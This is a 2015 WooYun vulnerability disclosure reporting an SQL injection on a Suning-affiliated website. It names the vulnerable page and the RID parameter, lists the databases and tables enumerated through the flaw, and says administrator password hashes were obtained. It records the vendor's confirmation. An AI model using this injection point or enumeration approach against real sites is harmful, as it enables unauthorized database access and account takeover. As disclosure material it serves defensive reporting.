当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094687

漏洞标题:苏宁某站注入漏洞 可获大量信息(可获管理员密码hash)

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: Mr.Q

提交时间:2015-01-30 11:00

修复时间:2015-03-16 11:02

公开时间:2015-03-16 11:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-30: 细节已通知厂商并且等待厂商处理中
2015-01-30: 厂商已经确认,细节仅向厂商公开
2015-02-09: 细节向核心白帽子及相关领域专家公开
2015-02-19: 细节向普通白帽子公开
2015-03-01: 细节向实习白帽子公开
2015-03-16: 细节向公众公开

简要描述:

苏宁某站注入漏洞 可获大量信息(可获管理员密码hash)

详细说明:

苏宁某站注入漏洞 可获大量信息(可获管理员密码hash)
附上注入点 http://www.suning.com.cn/ListPic.aspx?RID=5&BID=7
参数 RID

a.png



available databases [28]:                                                                                      
[*] BMSStore
[*] DB_ShuNin
[*] Dell_CMDB
[*] distribution
[*] Ecardtong
[*] FEPDW_S01
[*] HWATT
[*] iCCard
[*] jbtkq
[*] kaoqing
[*] localGPSDB
[*] MangageLeader3.0gr
[*] master
[*] model
[*] msdb
[*] OATOAMS
[*] PCMDB
[*] PLDM
[*] ReportServer
[*] ReportServerTempDB
[*] snuniversal
[*] suninghuanqiu
[*] tempdb
[*] VAMT
[*] VirtualManagerDB
[*] wx
[*] ZK
[*] zkteco_database


管理员信息 密码md5解密后可登陆后台

b.png


还有大量数据 不一一列举 望尽快修复

Database: suninghuanqiu
[8 tables]
+--------------------------------------------+
| Qwx_Admin                                  |
| Qwx_Column                                 |
| Qwx_Database                               |
| Qwx_Fail                                   |
| Qwx_Info                                   |
| Qwx_Label                                  |
| Qwx_Online                                 |
| dtproperties                               |
+--------------------------------------------+
Database: master
[59 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS       |
| INFORMATION_SCHEMA.COLUMNS                 |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES       |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE  |
| INFORMATION_SCHEMA.DOMAINS                 |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS      |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE        |
| INFORMATION_SCHEMA.PARAMETERS              |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES                |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS         |
| INFORMATION_SCHEMA.SCHEMATA                |
| INFORMATION_SCHEMA.TABLES                  |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES        |
| INFORMATION_SCHEMA.VIEWS                   |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE       |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE        |
| spt_fallback_db                            |
| spt_fallback_dev                           |
| spt_fallback_usg                           |
| spt_monitor                                |
| spt_values                                 |
| sys.all_columns                            |
| sys.all_objects                            |
| sys.all_parameters                         |
| sys.all_sql_modules                        |
| sys.all_views                              |
| sys.allocation_units                       |
| sys.assemblies                             |
| sys.assembly_files                         |
| sys.assembly_modules                       |
| sys.assembly_references                    |
| sys.assembly_types                         |
| sys.asymmetric_keys                        |
| sys.backup_devices                         |
| sys.certificates                           |
| sys.change_tracking_databases              |
| sys.change_tracking_tables                 |
| sys.check_constraints                      |
| sys.column_type_usages                     |
| sys.column_xml_schema_collection_usages    |
| sys.columns                                |
| sys.computed_columns                       |
| sys.configurations                         |
| sys.conversation_endpoints                 |
| sys.conversation_groups                    |
| sys.conversation_priorities                |
| sys.credentials                            |
| sys.crypt_properties                       |
| sys.cryptographic_providers                |
| sys.data_spaces                            |
| sys.database_audit_specification_details   |
| sys.database_audit_specifications          |
| sys.database_files                         |
| sys.database_mirroring_endpoints           |
| sys.database_mirroring_endpoints           |
+--------------------------------------------+
Database: DB_ShuNin
[35 tables]
+--------------------------------------------+
| D99_CMD                                    |
| D99_Tmp                                    |
| Info_Ad                                    |
| Info_Article                               |
| Info_Gbook                                 |
| Info_Job                                   |
| Info_Link                                  |
| Info_Member                                |
| Info_Order                                 |
| Info_PhotoList                             |
| Info_Procure1                              |
| Info_Procure1                              |
| Info_Product                               |
| Info_Recruitment                           |
| Info_Replay                                |
| Info_Resume                                |
| Info_SetJob                                |
| Sys_Channel                                |
| Sys_Class                                  |
| Sys_Config                                 |
| Sys_LoginUser                              |
| Sys_Menu                                   |
| View_ArticleClass                          |
| View_JobClass                              |
| View_PhotoListClass                        |
| View_ProcureClass                          |
| View_SetJobClass                           |
| djgz_users                                 |
| djgz_users                                 |
| floor                                      |
| news_class                                 |
| news_class                                 |
| product                                    |
| sqlmapoutput                               |
| zbgg                                       |
+--------------------------------------------+
Database: msdb
[21 tables]
+--------------------------------------------+
| backupfile                                 |
| backupmediafamily                          |
| backupmediaset                             |
| backupset                                  |
| logmarkhistory                             |
| restorefilegroup                           |
| restorefilegroup                           |
| restorehistory                             |
| suspect_pages                              |
| sysdac_instances                           |
| syspolicy_conditions                       |
| syspolicy_configuration                    |
| syspolicy_object_sets                      |
| syspolicy_policies                         |
| syspolicy_policy_categories                |
| syspolicy_policy_category_subscriptions    |
| syspolicy_policy_execution_history_details |
| syspolicy_policy_execution_history_details |
| syspolicy_system_health_state              |
| syspolicy_target_set_levels                |
| syspolicy_target_sets                      |
+--------------------------------------------+

漏洞证明:

已证明

修复方案:

你们更加专业 望尽快修复

版权声明:转载请注明来源 Mr.Q@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-01-30 17:26

厂商回复:

感谢提交

最新状态:

2015-05-27:suning.com.cn非易购域名,谢谢。